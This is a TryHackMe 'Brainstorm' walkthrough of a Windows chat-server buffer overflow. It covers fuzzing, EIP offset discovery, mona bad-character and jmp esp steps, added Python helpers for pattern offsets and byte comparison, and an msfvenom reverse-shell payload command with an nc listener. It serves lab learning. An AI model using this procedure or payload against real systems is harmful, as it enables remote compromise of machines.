TryHackMe — Brainstorm

Clarence Subia
4 min read · Oct 25, 2020

Reverse engineer a chat program and write a script to exploit a Windows machine.

NMAP Scan:

nmap -sC -sV -Pn -T4 10.10.175.210 --disable-arp -oX chatserver_nmap.xml

  • sC = default script scan
  • sV = version scan
  • n = disable DNS resolution (note the command above uses -Pn, which skips host discovery and treats the host as up)
  • T4 = aggressive timing
  • oX = write the results as XML to the named file

The first step is to grab chatserver.exe and essfunc.dll over FTP from the target machine to your local machine for debugging.

Open Immunity Debugger as Administrator on your local machine, attach chatserver.exe, and hit F9 to run the program.

Check how the application behaves using netcat. The vulnerable part of this application is the "Write a message:" prompt.

Simple python script that sends a bunch of As to the application:

This script tries to send 2500 As and checks whether the chatserver crashes.

Run python script:

The application crashed and EIP was overwritten:

Check the exact EIP offset using msf-pattern_create -l 2500.

  • l = length of the pattern

Copy the output, then replace the 2500 As in the python script with it.

Go back to Immunity Debugger, hit F12 to restart, then hit F9 again to run chatserver.exe.

Execute the python script again, then check Immunity. Once again we have crashed the application, but this time take note of the EIP value.

Locate the exact offset of EIP using !mona or msf-pattern_offset:

Using mona:

Using msf:

Edit the python script and change the pattern back to a bunch of As, but now multiplied by 2012, the EIP offset found above. In addition, append 4 Bs so that running the script overwrites EIP with 42424242.
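For readers who want to understand what msf-pattern_create and msf-pattern_offset are doing under the hood, here is an added example (not code from the original post) that rebuilds both tools in plain Python: the non-repeating "Aa0Aa1…" pattern, the reverse lookup from a debugger-displayed EIP value back to its offset, and the little-endian packing of a 32-bit address that the script edit later in the post relies on. The EIP value 31704330 used in the demo is derived here from the pattern at offset 2012 (the offset the post reports); it is not quoted from the post.

```python
import string
import struct

# Character sets used by msf-pattern_create: each position is an
# uppercase/lowercase/digit triplet, so every 4-byte window is unique.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before it would repeat


def pattern_create(length):
    """Build the non-repeating 'Aa0Aa1Aa2...' pattern, truncated to `length` bytes."""
    if length > MAX_LEN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_LEN)
    chunks = []
    total = 0
    for upper in UPPER:
        for lower in LOWER:
            for digit in DIGITS:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_hex, length):
    """Translate the EIP value shown by the debugger (e.g. '31704330') back into
    the four pattern characters it contains and return their offset, or None."""
    raw = bytes.fromhex(eip_hex.lower().replace("0x", ""))
    # x86 is little-endian: the register shows the bytes in reverse memory order.
    needle = raw[::-1].decode("ascii")
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def to_little_endian(addr_hex):
    """Pack a 32-bit address so its bytes land in memory in the order the CPU reads them."""
    return struct.pack("<I", int(addr_hex, 16))


if __name__ == "__main__":
    # 2500-byte pattern, as in the walkthrough; 31704330 is what sits at offset 2012.
    print(pattern_offset("31704330", 2500))   # -> 2012
    # The jmp esp address from the walkthrough, packed for the script.
    print(to_little_endian("625014DF").hex())  # -> df145062
```

Because every 4-byte window in the pattern is unique, a single crash is enough to recover the offset; if `pattern_offset` returns None, either the register did not land on the pattern at all (so the buffer may be too short) or the bytes were altered on the way in, which is exactly what the bad-character check later in the post is for.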

Once again, restart Immunity Debugger, run chatserver.exe, then execute the python script.

Now that we have confirmed that we can overwrite EIP, let's check for bad chars.

Generate a byte array in Immunity Debugger using mona:

Set the working folder in Immunity Debugger:

!mona config -set workingfolder c:\mona\%p

!mona bytearray -b "\x00"

Edit the python script to add the byte array; you can search for these badchars on Google, just don't forget to remove the "\x00".

Restart Immunity Debugger and run chatserver.exe, then run the python script. Once again, the application crashed. Let's compare the byte array to the memory at our ESP address:

!mona compare -f C:\mona\chatserver\bytearray.bin -a 018DEEC0

Unmodified means there are no more badchars.
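To make the "Unmodified" verdict concrete, here is an added example (not part of the original post and not mona's own code) that reproduces the logic behind !mona bytearray and !mona compare: build the byte array minus the bytes already known to be bad, then diff what was sent against what ended up in memory and report the first byte that was altered or where the copy was cut short. The memory snapshots in the demo are constructed in code to stand in for what the debugger would show.

```python
def generate_bytearray(exclude=(0x00,)):
    """Mona-style byte array: every value 0x00-0xff except those already known bad."""
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def compare_bytes(expected, observed):
    """Diff what was sent against what was found in memory.

    Returns a list of (offset, sent_byte, seen_byte); seen_byte is None when the
    copy in memory ended before that offset (a truncating bad char, e.g. 0x00)."""
    diffs = []
    for i, sent in enumerate(expected):
        seen = observed[i] if i < len(observed) else None
        if seen != sent:
            diffs.append((i, sent, seen))
    return diffs


def verdict(diffs):
    """Human-readable summary: 'Unmodified' or a description of the first corruption."""
    if not diffs:
        return "Unmodified"
    offset, sent, seen = diffs[0]
    if seen is None:
        return "Truncated at offset %d (byte 0x%02x missing)" % (offset, sent)
    return "Corrupted at offset %d: sent 0x%02x, found 0x%02x" % (offset, sent, seen)


if __name__ == "__main__":
    sent = generate_bytearray()          # 0x01..0xff, \x00 already excluded
    # Constructed snapshots, not real debugger output:
    clean = sent                         # the service copied everything intact
    mangled = sent[:9] + b"\x00" + sent[10:]  # a hypothetical service that zeroes 0x0a
    print(verdict(compare_bytes(sent, clean)))    # Unmodified
    print(verdict(compare_bytes(sent, mangled)))  # Corrupted at offset 9: sent 0x0a, found 0x00
```

Only the first reported difference is trustworthy on any one run: once a byte is dropped or translated, everything after it shifts, so the practical loop is to add that first byte to `exclude`, regenerate, resend, and repeat until the verdict is Unmodified, which is the state the walkthrough reaches after excluding only \x00.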

Let's now locate a jump point address.

!mona jmp -r esp -cpb "\x00"

Copy one jmp esp address, then edit our python script:

Transform the address to little endian:

625014DF = \xdf\x14\x50\x62

Add a NOP sled before the payload:

"\x90" * 32

Create the msfvenom payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python --var-name buffer EXITFUNC=thread -b "\x00"

Run a netcat listener, then run the script:

nc -lvnp 4444

To exploit the TryHackMe box, you just need to regenerate the payload in accordance with the target's IP address.
